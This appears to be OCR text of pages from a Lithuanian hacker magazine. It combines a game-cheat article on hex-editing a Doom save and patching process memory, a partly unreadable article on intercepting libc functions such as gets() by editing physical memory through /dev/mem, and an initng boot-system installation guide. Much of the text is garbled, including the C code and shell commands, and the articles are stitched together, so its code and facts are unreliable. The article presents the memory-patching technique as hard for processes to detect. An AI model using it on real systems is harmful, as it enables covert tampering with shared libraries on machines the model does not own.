arba pridėti naujus, primėtyti vaistinėlių ir kitų artefaktų, žodžiu, 
daryti stebuklus, bet apie tai kiek vėliau. Dabar mes apsiribosime 
tuo, kad papildysime šovinių, gyvybių ir šarvų atsargas, o taip pat 
herojui duosime visus ginklus, iš kurių aš pats pirmenybę teikiu ne 
BFG, o paprasčiausiam šautuvui (būtent vienvamzdžiui)! :) Vietoje 
seivų sulyginimo mes pasinaudosime alternatyviu metodu, kuris 
dar vadinamas „tiesiogine konstantine paieška“. Tarkim, pas mus 
susidarė tokia situacija: gyvybių — 6896, šarvų — 9596, šovinių 

73 (200 max), šoviniai šautuvui — 24 (50 max). 68 ir 95 
pakeičiame į šešioliktainę skaičiavimo sistemą ir gauname 44h ir 


5Fh. Išsaugome žaidimą į doomsav.dsg ir šią bylą užkrauname į 
hiew. Spaudžiam <F7> (search) ir ieškom 44h (dėmesio! Ieškant 
už 255 didesnių skaičių būtina atminti, kad jaunesnysis baitas 
saugomas mažesniu adresu, todėl ieškoti reikia atvirkščiai, t.y. 
su hiew ieškant 1234h, reikia įvesti 34 12). Ląstelė su ieškoma 
reikšme tuojau pat surandama su poslinkiu B4h. Galbūt tai ir nėra 
gyvybės, tačiau šalia jos yra 5Fh, o tai, kaip mes pamename, yra 
mūsų šarvai: 


Seivo bylos fragmentas su atminties ląstelėmis, kuriose saugomos 
gyvybės ir šarvų reikšmės 
00000080: 00 00 00 00-44 00 5F 00-01 00 01 0A-00 0000 00 D 277 
000000C0: 00 00 00 00-00 00 00 00-00 00 60 00-00 00 00 00 
000000D0: 00 06 00 00-00 00 00 00-00 00 60 00-00 00 00 00 
000000E2: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00 
000000F0: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 30 0 


47) 


Abu skaičius pataisome į FFFFh ir užkrauname pataisytą seivą. 
Nesunku pastebėti, kad mums viskas pavyko :). 


[Pabaiga] Įgyta patirtis labai praverčia dešifruojant tinklo pro. 
tokolus ir rekonstruojant nedokumentuotus bylų formatus ir failų 
sistemas, Kvalifikuotų specialistų mažai, taigi jų nuolat reikia, todėl 
nemirtingumas žaidimuose — tai visiškai ne pramoga! Tai labai 
rimta! Daugelis žymių hakerių pradėjo būtent nuo nemirtingumo. Jie 
perprato hex redaktorius, kankino derintuvus, po truputį studijavo 
asemblerį ir palengva judėjo link to, kuo jie yra dabar. Žodžiu, tu 
mane supratai. Sėkmės! 


[Autopatcher ADD AMMO CLIP.C] 
"delne: AO ADDR Ox56AF28 
"delne: MMO. VALUE 66 
"delne MMO. SE | 
mainlint «, dhar“* V) 
t 
II apibrėžiama: kintamuosius ir patikinane komandinės eiltės argumentus 
int x; HANDLE h; unsigned int 
ammo = ANMO VALUE; if (c < 2) retun -I; 
1/ alidarome procesų 
It (h=Openocss(PROCESS. V VRTE | PROCESS VM OPERATION, 0, G'a(/1]) 
retu prin(„-er:apen process adv“, atol([1])); 
I/ keletą kartų per sekundę popildome šovinių alsargą 
1/ 869 — vžlailymas tap ahnaujinimų (miisekundėnis) 
while (WitePrcessttemorylh, AMMO ADDR, šammo, AMC SI2E, 8s))Slep(669); 
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Sisteminis špionažas „*nix“ sistemoje 
Pirmoji dalis 

Nuo sistemos nepriklausomas 

bibliotekinių funkcijų perėmimas 


KAIP SUŽINOTI, KOKIAS 
FUNKCIJAS IŠKVIEČIA 
BANDOMOJI PROGRAMA? 
NORINT TAI PADARYTI 
WINDOWS SISTEMOJE, 
GALIMA RASTI IŠTISĄ 
ŠNIPINĖJIMO PRIEMONIŲ 
ARSENALĄ, TAČIAU *NIX 
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RINKINĮ TENKA KURTI 
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SISTEMINIŲ BEI 
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[Įvadas] 

Nors Windows ir Linux nėra panašios viena į kitą, tarp jų galima rasti bendrų bruožų. Abi sistemos iš įvairių hierarchijos 
lygių bibliotekų suformuoja „sluoksniuotą pyragą“. Branduolinės Windows NT funkcijos sukauptos byloje ntoskrn/.exe, 
prie jų prieiti galima per INT 2Eh (NT 3.5x, NT4.x, W2K) arba per INT 2Eh/sysenter (XP, Longhorn) pertraukimus. Linux 
sistemoje tuo pačiu tikslu naudojamas INT 80h pertraukimas (x86 BSD naudoja hibridinį mechanizmą ir vienu metu 
pripažįsta tiek INT 80h, tiek ir call far 0007h:00000000h) 

Branduolys užsiima pagrindinėmis įvedimo/išvedimo funkcijomis, atminties paskirstymu, procesų sukūrimu/užbaigimu 
irt.t., beje, jeigu NT suteikia žemo lygio pusfabrikačius, prie kurių dar reikia padirbėti, tai branduolinės Linux funkcijos 
(kurios dar kitaip vadinamos „sisteminiais iškvietimais“, angliškai sys-calls) yra kuo puikiausiai vartojamos. Nepaisant 
to, tiesioginiai kreipiniai į branduolį iš taikomojo (aplikacijos) lygio sutinkami retai. Vietoje to programos pirmenybę 
teikia nuo sistemos nepriklausomai bibliotekai libc.s0.x, kuri yra tolimas Windows bibliotekos kerne/32.all analogas. Ši 
biblioteka į fizinę atmintį užkraunama viso labo vieną kartą, po ko ji projektuojama į visų ją naudojančių procesų adresų 
erdvę („so“ šifruojasi kaip shared object [file], 0 x čia yra versijos numeris, pavyzdžiui, libc.s0.6). 

Be libc yra ir kitų bibliotekų, pavyzdžiui, libncurses.so.x, kuri atsakinga už kursoriaus valdymą ir pseudografikos piešimą 
tekstiniame režime (user32.dll analogas). Bibliotekos gali būti prijungiamos tiek ir elf bylos užkrovimo stadijoje per 
simbolių lentelę (importo lentelės analogas), tiek ir dinamiškai programos vykdymo metu iškviečiant funkcijas dlopan/ 
dlsym (LoadLibrary/GetProcAddress analogas). Galų gale bet kuri programa turi daugybę neviešų ir neeksportuojamų 
funkcijų, kurias taip pat reikia periminėti. 


thunk, kuris gali protokoluoti 
argumentus arba net perduoti 


urioje *nix tipo 
J tam tikrais pak 
t.y. nuo toli 
audoje 
importo [lentelės] modifika 


štai taip: 
a. Be to, bandomasi: 


Tam jam 
p pačiam pe i. Tokiu atveju 
S iš disko nuskaito pradinį ELF bylo: 

aizdą, todėl visi 
ti. Kad taip nenutiktų 
tencialiai p ingas 


* su funk 
pid, addr, 
kutinis (tačiau ne pagrindir 

pionažas yra išskirtinai lokalaus 


įlei 


as, pakeisdami jas į offset thunk, kur thunk štai kita: 
naip ar kitaip įterptas | pr +] s pakeitimu“ ir taip p. 


i, su tuo pačiu PTRACE POKE- Windows pasaulio: 
* aplink bibliot 


dinamiškai užkraunamos bibl ontroliuojamos kuris ek t nko kaip ir bibli 


perimant libal.so.x eksportuojamas, tačiau faktiškai libc. 
funk ach aksym sh * originalią bibliot 
kitu 
atinės Ikale esančios funkcijos 


s perimamos į jų pradžią įdiegiant komandą ntifikatorių, ir j 


suplanuoti 
rašomas į logą, pakeiči 


1mp thunk uprantama, originalų turinį prieš 
ai reikia k Šsaugo ant pagal natūras 
rba susijus su fiksuotais adresais; kodasirt.t.). Kai 
ame-rūs proceso su“ funkčija įrašė engva, juk apvalkale įrašytos fur 
DETACH/PT DEATACH, pid, O, O), tuo pačiu 
sprendimas susiveda į einamo proc 


funkcijas radimą, ką daro fui 


* apvalkale esanti funkcija valdymą perduoda pagrindinėje bibliotekoje įsikūrusiai originaliai funkcijai arba savo pačios 
pakištai funkcijai; 

Po išoriniu tokių metodu įgyvendinimo paprastumu slypi ištisa problemų šūsnis. Rankiniu būdu sukurti apvalkalu: 

visoms „sisteminėms“ bibliotekoms praktiškai nerealu, todėl šį darbą būtina automatizuoti, parašant n 

so bylų apdorotuvą ir kodo generatorių. Nėra būtina generuoti paruoštą ELF bylą, paprasčiau sukurti C programą ir 
ją sukompiliuoti su gec. 

Perėmimo „globalumas“ turi įtakos visiems procesams todėl kreivai parašytas „apvalkalas“ sistemą laužia taip, kad 
tik spėk gaudyti skraidančius core-dump'us. Gal geriau nelieskime sisteminių bibliotekų, o vietoje to pakeiskime 
bandomojo“ proceso aplinkos kintamąjį LD. LIBRARY PATH. Šis kintamasis specialiai numatytas tam atvejui, jeigu 
atskirai paimtai programai norisi suteikti savo bibliotekų rinkinį (statiniai ir dinaminiai užkrovėjai bibliotekos iš pradžių 
ieško kintamajame LD LIBRARY PATH nurodytose vietose, ir, jeigu jos ten nėra, pereina prie bylos /etc/Id.s0.conf, 
0 po to prie katalogų /ib ir /usr/lib), tačiau jeigu „bandomasis“ procesas biblioteką pabandys užkrauti naudodamas 
absoliutų kelią, jis sugebės ištrūkti! 

Perspektyviausia būtų perėmimą atlikti tiesiogiai modifikuojant bandomojo proceso atmintį nesikreipiant į ptrace 

Kaip tai galima padaryti? Pirmiausia į galvą ateina byla /proc/<pid>/mem, tačiau daugelyje sistemų ji neprieinama 
net root'ui, todėl tenka nusileisti į branduolio lygį, kas išties užknisa. Hakeriški šaltiniai mini dar dvi įdomias bylas: 
dev/mem (fizinės kompiuterio atminties atvaizdas prieš virtualių adresų transliaciją) ir /dev/kmem (virtualios brar 

duolio atminties atvaizdas). /dev/kmem byla iš taikomojo lygio paprastai neprieinama, čia nėra jokių taikomojo lygio 
bibliotekų, todė! mums ji visiškai neįdomu, o /dev/mem mes išnagrinėsime kiek detaliau. 


Čia pagrindinė problema tame, kad *nix operaty 
atminti naudoja kaip kešą, todėl vieni ir tie patys fiziniai 
puslapiai skirtingu laiku gali atitikti skirtingus virtua 
us adresus. Tačiau tai ne problema. Galima surasi 
puslapių katalogą bei transliaciją atlikti rankiniu būdu 
Rodyklė į einamą katalogą saugoma CR3 registre, prie 
kurio bandant prieiti iš taikomojo lygio aktyvuojama 
išimtis (exception), tačiau kadangi katalogas turi gan 
standartinę procesoriaus dokumentacijoje aprašytą 
struktūrą, ją lengva surasti paprasčiausiai skenuojan! 
fizinę atmintį 
Dalis procesui priklausančių virtualių puslapių 
būti iškelta į diską, tuomet /dev/mem byloje jų nebu 
Chroniško operatwinės atminties trūkumo atveju 
proceso adresų erdvės dalis patenka į diską, ir nors ben 
drai naudojamos bibliotekos Jmiamos paskutinės, jo 
vis tiek išstumiamos (ypač retai naudojamos funkcijos. 
Tai reiškia, kad prieš pradedant kapsty dev/men 
byloje, reikia į atmintį rauti atitir 
kaip tai padaryti? Paprasčiausiai ją iškvieči 
iškvietimas negarantuoja, kad į atmintį bus užkrauti v 
jai priklausantys puslapiai, tačiau mums to ir nereikia 
Pakanka į funkcijos pradžią įterpti jump į savo thunk 
kad būtų užkrautas pirmasis puslapis 
Siekiant neutralizuoti pašalinius efektus, funkcija pa- 
prastai iškviečiama su klaidingais argumentais, kad 
ji baigtųsi nieko neįvykdžiusi, tačiau tai — nešvarus 
triukas, kuriam pasiduoda toli gražu ne visos funkcijos, 
Pavyzdžiui, gets() atkakliai laukia įvedimo iš klaviatūros, 
net jeigu vietoje rodyklės šiai funkcijai perduotume 
nulį. Jeigu mes galime nuskaityti funkcijai priklausančie 
atminįį (o Linuxy/BSD sistemoje tai galima padaryti), ta 
mums pakanka nuskaityti keletą funkcijos pradžios baitų 
tai garantuotai į fizinę atmintį įkraus jai priklausant 
„ Tiesą sakant, norint /dev/mem byloje surast 
perimamą funkciją, mums vis tiek prireiks jos signatūros, 
todėl be skaitymo čia mes neapsieisime. 


rid“ programa po truss mikroskopu 


[/dev/mem] Paskaičius dokumentaciją („man mem“) 
paaiškėja, kad byla /dev/mem naudojama praktiškai 
visose *nix tipo sistemose, o jeigu jos nėra, ji vis tiek 
gali būti sukurta bet kuriuo momentu, kas atliekama su 
šiomis komandomis 


4 mknod —m 660 


2 chown root:kmem /dev/mi 


Čia 660 — priėjimo teisės, /dev/mem -- bylos pavadinimas 


(gali būti bet koks, pavyzdžiui, /home/kpnc/nezumi), „C 
yra įrenginio tipas (simbolinis įrenginys), „11“ — įrenginys 
(fzinė atmintis). /dev/mem byla yra laisvai prieinama iš 
taikomojo lygio, tačiau tik root vardu, kas nėra gerai 
Bylos struktūra labai paprasta — linijiniai poslinkiai 
atitinka fizinius adresus. Tarkim, mums žinoma, kad 
visuose BIOS'uose FFFFh:FFFOh adresu saugoje 
perėjimo į užkrovimo kodą komanda, o po jos dažniau 
saugoma mikroprogramos sukūrimo data. „Saldž 
porelę“ segmentas:poslinkis transformuojame į linijinę 
formą (linear seg*10h + offset), gauname FFFFOh. 
Tai ir bus poslinkis byloje. 


dami perėmimo, tačiau iš pra 


su /devimem: 


irk udo 0 pė 

funkcijas, p open/read/write. 
Knoppix re D sistemose fopen) 
kia normaliai, tačiau gali būti, kad kitose 


e elgiasi kitaip 
amiesi bendromis rek 
ažytis niuansas: Fre 


dev/mem j 
>galima pasit funkci 
Pabandykime 


padaryti mažiai 
kalba arba 
ką patvirtina ir progra t addrc, kuri nustato funkcija 
(išeiti 
Kompiliuojam (gi ddr.c t addr -Idl) ir paleidžia 
lą (;-Idl“ raktas priju 
open ir disym). Mano kompiuteryj 
mašininį kodą, reikia nueiti 
į meniu Options, p nkti opciją „Text representatic 
ir lauke „N b 7*). Jeig 


ą (08048 
inamo pro *. Pirmieji funk 
A8h 98h 04h O8h, kas atitinka komandą JMP 
pati fur 


perėmimą užtikrina 
ės net labai gerai 


t 


Žvaigždėtas dangus Ir ne matrica, O sėkr os gets nulatėi 


FreeBSD sistemoje 


neturi IDA PRO, tuomet funkcijos turinį galima 
nustatyti su mūsų programa get adidr.c. Mano 
kompiuteryje pirmieji 10h funkcijos gets baitų 
atrodo taip: 55h 89h E5h 57h 56h 53h 83h 
ECh 2Ch 8Bh 75h O8h E8h ACh 4Dh FBh, 
Atsidarome /dev/mem su hexeditor'iumi ($ 
hexedit /dev/mem), spaudžiam <Ctr!-S> 
(search) ir įvedame šią seką be priesagų h ir 
be tarpų 589E557565383EC2C8B7508E 
8AC4DFB“. Redaktorius šiek tiek pagalvoja ir 
pateikia rezultatą. Pas mane gets adresas at 
mintyje buvo 6BA8E60h. Tai — fizinis adresas, 
kuris nėra pastovus. Šis puslapis gali būti daug 
kartų išstumtas iš atminties ir užkrautas visiškai 
kitais adresai 

Dar kartą nuspaudžiam <Ctrl-S>, kad 
įsitikintume, jog šis įėjimas buvo vieninte 
lis. Jeigu ieškoma seka atmintyje išsaugota 
keliais adresais, tai reiškia, kad arba įvyko 
kolizija (sutapo su kita funkcija), ir tuomet 
ieškomą seką reikia pailginti keliais baitais, 
arba į atmintį užkrauta kelios bibliotekos, 
kuriose yra viena ir ta pati funkcijos gets 
realizacija (arba gets eksportuojanti bibli- 
oteka pakliuvo į disko kešą), tuomet mums 
reikia atkreipti dėmesi į jauniausius 3 baitus. 
Fiziniai ir virtualūs mūsų funkcijos adresai 
bus lygūs, kadangi puslapio pradžios adresas 
visada dalinasi iš 1000h. Jeigu nesurastas 
nė vienas įėjimas, funkcijos gets atmintyje 
nėra (neužkrauta biblioteka arba puslapis 
išstumtas į diską), ir tuomet mums reikia 
ją užkrauti 


Kita priežastis — ieškoma seka kirto atminties 
puslapio ribą, o kaip mes jau kalbėjome 
fizinių puslapių tvarka nesutampa su virtu- 
aliais. Šiuo atveju viskas gerai: tarp 
pradžios ir fizinio puslapio pabaigo: 
PAGE SIZE - (address of func 96 PAGE SIZ 
= 1000h - (4008CE60h9460x1000) = 
1A0h baitai, ko paieškai daugiau nei pal 
tačiau ką mes darytume, jeigu šis dydis 
būtų viso labo keletas baitų?! Ogi nieko 
paprasčiausiai atmintyje funkcijos ieškotume 
ne nuo pačios funkcijos pradžios, 0 nuo 
priklausančio puslapio pradžios, tal yr: 
(Imemcmp(dlsym(lib. name, func ne 

8 OxFFFFFO00, buf page)). Šiuo atveju 
mums pakanka, kad tarp funkcijos prad 

ir puslapio pabaigos būtų V 
kurių reikia komandai jump thunk įterpti. O 
jeigu šių baitų nėra? Tuomet reikia ieškoti kilo 
puslapio ir įsiterpti į funkcijos vidurį (tačiau 
tai pats sunkiausias variantas ir čia jis nebus 
aptariamas) arba į funkcijos pradžią įterpti 
C3h ir periminėti branduolio išimtį 

Toliau paruošime testinę programą, kuri 
iškvies funkciją gets. Vienas iš realizacijos 
variantų atrodo taip: 


labo 5 baitai 


Elspermertam piogiona 
domt.c 
char ui[ė6ė) 


while(stremp(buf, "exil") 


Išėję iš hex redaktoriaus ją sukompiliuokir 
(goc demo.c -o demo) ir paleiskime (/demo). 
Programa veikia taip, kaip ir priklauso, 
t.y.: laukia įvedimo iš klaviatūros ir išeina 
įvedus „exit“. Dabar pirmąjį funkcijos baitą 


pakeiskime į C3h, išsaugokime pakeitimus 
) ir dar karta ją iskime (./demo). Šį 
kartą funkcija gets tuojau pat grąžina valdymą 
ir nekreipia jokio dėmesio į klaviatūre 
ekranas užsipildo darniomis taškelių « 
Valio! Mums pavyko! 
Gets() modifikacija įtakoja tiek jau paleisi 
tiek ir vėliau paleisimus procesus, + 
procesui labai sudėtinga nustatyti, kad 
nulaužtas! Pastaba: jeigu gets() jau laukia 
įvedimo, tai 55h pakeitimas į 3h nesukelia 
nedelsiamo išėjimo iš funkcijos, 0 rezult 
tas bus pastebėtas tik ją iškvietus sekantį 
kartą. 
Kiek tai patikima? Kas bus, jeigu modi- 
fikuotas puslapis dėl atminties trūkumo bus 
ištremtas, o koks nors procesas pabandys 
dar kartą užkrauti nulaužtą biblioteką? Ar 
operacinė sistema garantuoja situacijos 


neprieštaringumą? Dokumentacija (žr. 
*) į iškeltą klausimą neatsako, ir tai teisinga, 


pių modiii ebi ne operac 
Okio ira: 


puslapį jį derėtų įrašyti (dump) į diską 
nėra specialaus „nulaužtų“ puslapių 
puslapiai apdorojami lygiai taip pat 
kaip ir visi kiti (ko mums ir reikia). Joks procesas 
perkrauti“ nulaužtos bibliotekos, kadangi 
to jokios būtinybės iš lėto disko nuskaityti 
TTT tai, kas jau yra operatwinėje atmintyje. Galima 
manyti, kad jeigu visi procesai iškrautų modifikuota 
biblioteką, po kurio laiko operacinė sistema ištiesų 
išmestų iš atminties ir pakartotino užkrovir 
metu kreiptųsi į diską. Tada mūsų Jauži 
šuniui ant uodegos, ta okia situa 
tikėtina. Bet kokiu at 1 galima I 
periminėjant d. 
Apjui 
me pajė; 
rankį. k 


apribojin 

teksti Keletas 

pastabų apie šią programą: siekiant sumažinti 
Kolizijų skaičių ir pagreitinti paiešką. suly 

atliekamas prisirišus prie poslinkio puslapio viduje 

konstrukcija page buf[((unsigned 


pecialiai dėl tc 
doroja situacijas, kuom 
sutinkama daugiau nei V 


ju ji siūlo si 
SG SIZE, kuri atsako Už S 
dar kartą kartoti sav 
Kompiliui ogramą (goc mem.c -O2 
Idl) ir ją paleidžiam. Pirmasis komandinės 
bibliotekos pavadinimas, antra- 
funkcijos pavadinim 
ramą be argumentų, laužiama libc.so.6 bio- 
liotekos funkcija J pradžioje 


ir įrašo 55h, Ly. veik 
nulaužti fun 

sraudžiai) 
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š Zaibiškas 
tukso užkrovimas 
„Initng“ — nauja pradinės „SystemV 
Init“ inicializacijos karta 
< SIANDIEN MES PAKALBĖSIME APIE 
Z INITNG — NAUJĄ TAVO LINUKSO INI- 
CIALIZACIJOS SISTEMĄ. INITNG YRA 
NAUJA INIT KARTA, APIE KĄ ISKALBINGAI 
BYLOJA SIOS SISTEMOS PAVADINIME 
PAVARTOTOS RAIDĖS NG (NEXT GENERA- 
< TION). PAGRINDINIS INITNG PASAUKIMAS 
š — TAPTI DEMESIO VERTA SENO GERO INIT 


PAMAINA. ŠIAME STRAIPSNYJE MES 
ĮSITIKINSIME, AR TAIP YRA IŠ TIKRŲJŲ. 


[INIT VS INITNG] Kas gi tokio gero tame initng, kad apie 
jį verta kalbėti? Norėdami suprasti skirtumą prisiminkime, 
kaip veikia klasikinė init versija. Visų pirma paleidžiamas 
branduolys, kuris sumontuoja šakninę failų sistemą ir 
paleidžia inicializavimo programą /sbin/init. Šia reikšmę 
gelima pakeisti su specialiu branduolio parametru: 


int /kelias/ki/inicairvimo/progamos 


UNIXOID 


Branduolys po užsikrovimo nurimsta, kadangi visą 
tolimesnį darbą atlieka init. Jeigu šios programos paleisti 
nepavyksta, branduolys panikuoja, tolimesnis darbas 
negalimas. Norėdamas nustatyti reikiamą paleidimo lygį, 
init peržiūri bylą /etc/inittab: 


d:5:initdefauli 


CODING 


Tada priklausomai nuo lygio init paleidžia /etc/rc.d 
kataloge ir jo subkataloguose saugomus skriptus. Čia 
esminė frazė — „paleidžia skriptus“, kurių vykdymu 
užsiima komandų interpretatorius (paprastai /bin/bash), 
ty. „pašalinė“ programa. 

Initng savarankiškai vykdo savo konfigūracijos bylas, 
kuriose nurodyti sistemos inicializavimo veiksmai, dėl ko 


UNITS 


sistemos užkrovimo laikas smarkiai sumažėja. Iš tiesų, įdiegus Ir 
sukonfigūravus initng mano FC3 pasileidžia praktiškai akimirksniu. 
Po to, kai aš viską teisingai sukonfigūravau ir perkroviau sistema, 
iš pradžių net nesupratau, kad sistemos užkrovimas jau baigtas. 


[Pasiruošimas įdiegimui] Initng galima parsisiųsti iš čia: initng. 
thinktux.net/download/vO.5/ (arba pasiimti iš mūsų CD). Ten rasi 
tiek archyvus su išeities tekstais, tiek ir jau sukompiliuotus rpm 
paketus. Siūlyčiau parsisiusti būtent išeities tekstus, beje, pačia 
paskutinę versiją. 

Asmeniškai aš Linux naudoju ne tik eksperimentams, bet ir kas- 
dieniniam darbui, todėl naujus paketus įdieginėju retai. Dabar 
mano diske draugiškai gyvena Linux Mandrake 10 ir Fedora Core 
3. Taip, sistemos nera pačios šviežiausios, tačiau jos mane pilnai 
tenkina. 

Iš pradžių aš pabandžiau initng įdiegti į mano mėgiamą Linux 
Mandrake. Įdiegt tai aš ją įdiegiau, tačiau „naujos kartos inicial- 
izacijos sistema“ atsisakė veikti. Kodėl? Ji numatyta... naujesnėms 
sistemoms. Jeigu pabandysi į Linux Mandrake 10 arba tą pačią 
Fedora Core 3 įdiegti rom paketą su initng, tai pamatysi, ko reikia 
šiai versijai įdiegti. Initng 0.5.3 versija reikalauja filesystem 2.2.4 
arba naujesnės versijos paketo, glibc 2.3.4 arba naujesnio, taip 
pat SELinux. 

Vien dėl initng įdieginėti Mandriv'ą, manau, neverta, todėl „po 
skalpeliu“ paguldžiau trečiąją Fedora Core versiją. Šioje versijoje 
yra filesystem 2.3 paketas, yra SELinux, o tai, kad nėra glibc 
2.3.4 — anokia bėda. Aš pirmenybę teikiu initng kompiliavimui iš 
išeities tekstų, todėl kompiliavimo metu bus naudojama esama 
glibc versija (2.3.3). Pabandžius įdiegti ppm paketą į FC3 nepat 
enkinus priklausomybių paaiškėjo, kad initng neveiks. Beje, apie 
tai iškalbingai praneš pats branduolys, kai po perkrovimo pamatysi 
pranešimą, kad initng negali būti paleistas, kadangi gamintojų 
sukurtas rpm paketas skirtas glibc 2.3.4 versijai. 

Jeigu tu esi iš anksto sukompiliuotų paketų šalininkas ir pas tave 
yra pati naujausia operacinės sistemos versija, tuomet parsisiųsk 
šviežią rpm ir jį įdiek su štai tokia komanda: 


7 pm-ihv iniing-0.5.3-1.i386.9pm 


[„Initng“ įdiegimas] Iš pradžių aš initng įdiegiau į realią (fizinę) 
sistemą — savo namų kompiuterį. Po to, kai initng jame pradėjo 
puikiai veikti, aš viską pakartojau virtualioje mašinoje su VMWare. 
Taip aš vienu šūviu pribaigiau du zuikius: atsakiau į tavo klausimą 
dėl initng panaudojimo VMWare aplinkoje ir padariau pradinio 
sistemos užsikrovimo ekrano vaizdus. 

Prieš initng įdiegimą įsitikink, kad pas tave įdiegtas gcc kom- 
piliatorius, programos automake ir autoconf, taip pat turėk 
antraščių bylas — viso to prireiks initng kompiliavimui. Kad nebūtų 
nesusipratimų, visus tolimesnius veiksmus atlik root vardu. 
Išpakuok initng-0.5.3.tar.gz į /usr/src katalogą. Taip bus sukurtas 
katalogas /usr/src/initng-0.5.3. Pereik į jį ir įvykdyk komandą: 


2. Jautogen.sh 
Lyginant su ./configure, naujasis skriptas kur kas informatyvesnis, 
be to, jis paleidžia ./configure Makefile sukūrimui. Toliau įvykdyk 


dar dvi komandas: 


2 make 


te/llo.conf 


edagavimas 


Greičiausiai su initng kompiliavimu tau neturėtų iškilti jokių problemų. Jeigu 
Juvis tikyra, tai reiškia, kad tu kažko nejdiegei. Dar kartą paleisk autogen. 
ir atidžiai pažiūrėk, ką jis tau rašo. Autogen.sh išvedimą galima net 
nukreipti į bylą, kad po to neskubant būtų galima viską peržiūrėti 
Be target'o install galimi dar du: 

clean pašalina sukompiliuotas bylas iš katalogo, kuriame 
saugomi išeities tekstai 
* uninstall — išmeta initng 


Nereikėtų pamiršti ir apie atitinkamą užkroviklio konfigūraciją. Juk 
mums reikia pridėti branduolio parametrą init, kad nereikėtų jo 
nurodyti kiekvieną kartą užsikrovimo metu. Jeigu pas tave LILO, 


2. initng kompiliavimas (make 


E paleidimo pradžia 


6. GUI prototipas In 


onfigūravi 


(greičiausiai taip ir yra), tuomet i 
pridėk šias eilute: 


tūle linuxinitną 
kernel (hd0,)) 
tool = /dev/hdo2 


ni  /sbin/ini 


Atkre 
Šiuo atveju Linu 


tuomet su savo m 
redaktoriumi atid 


etc/lilo.conf, 


amu 


aryl 
nukopijuok 
tavo pagrindinį branduolį 
aprašančią 
ir ja paredaguok — di 
rektyvai append pridėk 
parametrą „init 
itng“. Paredagavus 
užkrovėjas turi iš naujo per. 
skaityti savo konfigą. Tam 
įvesk komandą. 


mage sekciją 


sbin/in 
bylą 


Jeigu 


figa 


pas 


boot/gr 


pk dėmesį į partciją su įdiegtu Linux bei į branduolio bylos pavadinimą 
įdiegtas į /devhda2 (parametras root, | 


ris nurodo 


šakninę failų sistemą). Branduolio byla vadinasi vmlinuz 2.6.9-1.667. 


fiziškai ji saugoma toje pačioje particijoje 


konstrukcija (hd0,1) atitinka 


dev/hda2. Grub atveju perrašyti užkrovėjo konfigūracijos nereikia. 


(a 
5 


58] 


[HAKERIS +07 [38] 06 


[„Initng“ paleidimas] Norint paleisti Linux su initng, užkroviklio 
meniu reikia pasirinkti įrašą, kuris užtikrina tavo sistemos paleidimą 
su initng. Taigi jaudinantis momentas, Linux startuoja. Kaip įprasta, 
iš pradžių eina branduolys, po to — initng. Derėtų pastebėti, kad 
initng agetty paleidžia visiems terminalams, išskyrus tty1.. Pirmame 
terminale nuolat bus atvaizduojami sistemos užsikrovimo „likučiai“, 
kuriuos galima peržiūrėti pasinaudojus Shift+PgUp/PgDn. Jungtis 
galima į bet kurią konsolę, pradedant antrąja (tty2), į kurią pereisi 
nuspaudęs Alt+F2 


[Konfigūracinės bylos] Visos konfigūracinės initng bylos dalina- 
mos į dvi grupes: paleidimo lygių bylos ir servisų bylos. Pirmosios 
yra pačiame /ete/initng kataloge, turi praplėtimą „.runlevel“ ir 
saugo servisų, kurie turi būti paleisti atitinkamame lygyje, sąrašą. 
Antrosios bylos saugomos katalogo /etc/initng subkataloguose, jų 
praplėtimas — 
Yra trys pagrindinės paleidimo lygiu bylos: default.runleve!, single. 
runleve! ir system.runlevel. Pirmoji — tai paleidimo lygis pagal 
nutylėjimą, antroji — vieno vartotojo režimas (1 lygis), trečioji 
— sisteminis lygis. Su pirma byla viskas aišku — ji paleidžia tavo 
lygi pagal nutylėjimą. Trečioji byla užtikrina pirmojo paleidimo 
lygio, ty. single režimo užkrovimą — ji paruošia viską, ko reikia 
sistemos darbui. O kaip gi su single.runlevel? Ji skirta pirmojo 
paleidimo lygio „praplėtimui“. Joje yra viso labo viena instrukcija 
— sisteminio lygio (system) iškvietimas, tačiau esant būtinybei čia 
tu gali pridėti papildomų programų iškvietimus, neredaguodamas 
system.runlevel bylos. Įdiegus initng, suformuojama byla default. 
runlevel: į ją pridedami servisų įrašai, kurie turi būti paleisti tame 
lygyje, kuris initng įdiegimo metu buvo tavo sistemos užkrovimo 
lygis pagal nutylėjimą. Pavyzdžiui, jeigu tavo sistema pasileisdavo 
penktame lygyje, tai | default.runlevel bus pridėti Visi reikiami 
įrašai, kad po perkrovimo su initng tu nepajaustum jokio skirtumo 
(savaime suprantama, išskyrus užkrovimo greitį). 

Diegiant initng aš dirbau trečiame lygyje, todėl pas mane buvo 
sukurta tokia default.runleve! byla: 


syslėm 
doemon/klogd 
daemon/elh) 
doemon/syslogd 
daemon/sshd 
dagimon/gpm 
daemorVkinetd 
daemon/sendmail 
doemon/ds 


Pirmoji eilutė — tai sisteminio paleidimo lygio iškvietimas, kuris 
yra privalomas visiems lygiams. System lygyje vykdomos siste- 
mos darbui gyvybiškai svarbios instrukcijos: udev, užkraunami 
moduliai, USB ir tinklo (lo sąsaja) galimybė, paleidžiamas agetty, 
užkraunamas sisteminis šriftas, paleidžiama iptables ir visa kita. 
Atsidaryk bylą system.runleve! ir pats viską suprasi. Tačiau ją red- 
aguoti vertėtų tik tuo atveju, jeigu tu esi visiškai tikras dėl savo 
veiksmų. 

Po viso šito paleidžiamas branduolio loginimo demonas (klogd), 
sukonfigūruojama sąsaja ethO, paleidžiamas sisteminio loginimo 
demonas, ssh serveris, pelės servisas konsolėje (gom), taip vadi- 
namas superserveris (Kinetd), MTA agentas (sendmail) bei šriftų 
serveris (xfs). 


Užeik į subkatalogą daemons. Jame tu rasi daugelio demonų 
(servisų), kurie gali būti įdiegti tavo sistemoje, paleidimo .i bylas. 
Pavyzdžiui, web serverio paleidimui naudojama byla http.i. Kad web 
serveris būtų automatiškai kraunamas sistemos krovimosi metu, į 
default.runlevel bylą pridėk šią eilutę: 


daemon/hipd 


Korektiškesniu servisų pridėjimo į paleidimo lygį būdu laikoma 
programa ng-update, kadangi ji įvertina priklausomybes tarp 
servisų. Apie ką aš kalbu? Pavyzdžiui, įsivaizduok, kad pas mus 
yra demonas B, kuris priklauso nuo serviso A. Jeigu tu nori į 
užkrovimo lygį pridėti demoną B, tai jį reikia įrašyti po A, kuris jau 
turi būti paleistas dar prieš paleidžiant B. Aš noriu pasakyti, kad 
